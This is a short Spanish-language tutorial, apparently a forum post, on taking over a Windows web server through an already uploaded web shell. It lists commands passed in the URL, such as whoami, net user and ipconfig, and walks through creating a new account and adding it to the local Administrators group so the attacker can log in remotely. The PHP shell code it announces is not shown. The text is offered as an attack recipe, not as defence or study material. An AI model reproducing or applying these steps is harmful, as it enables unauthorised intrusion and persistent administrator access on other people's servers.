Elevar privilegios en servidores windows
Bueno primero necesitan tener subida una shell a una web.
Después tener un archivo shell server windows subido en la web.
El código que incrustaremos es este:
Ya con el archivo subido van al link website.com/archivo.php?cmd=whoami y les tiene que aparecer NT
AUTORITHY/SYSTEM si no les sale nada o les sale NT es porque no tiene servidor vps la web.
Ya que realizado lo anterior ahora ponemos : website.com/archivo.php?cmd=net user para ver los usuarios que tiene el servidor VPS.
Ya que hecho esto, ponemos: website.com/archivo.php?cmd=net user (NOMBRE DEL USUARIO QUE VAN A CREAR) (CONTRASEÑA QUE VAN A PONERLE) /add esto es para crear el usuario, sin los paréntesis.
Bueno ya que hicimos esto nos aparecerá (THE COMMAND COMPLETED SUCCESSFULLY) ya hecho esto hacemos lo siguiente: website.com/archivo.php?cmd=net user para ver nuestro usuario añadido si no sale es que hicieron algo mal.
Ahora hacemos esto: website.com/archivo.php?cmd=net localgroup Administrators (NOMBRE DEL USUARIO QUE HAN CREADO) /add y tiene que salir (THE COMMAND COMPLETED SUCCESSFULLY) esto es para darnos privilegios de Administrador en el servidor vps, sin los paréntesis.
Ahora para saber la IP del servidor VPS ponemos: website.com.com/archivo.php?cmd=ipconfig
Ya hecho todos estos pasos, podremos acceder al servidor vps como un Administrador.
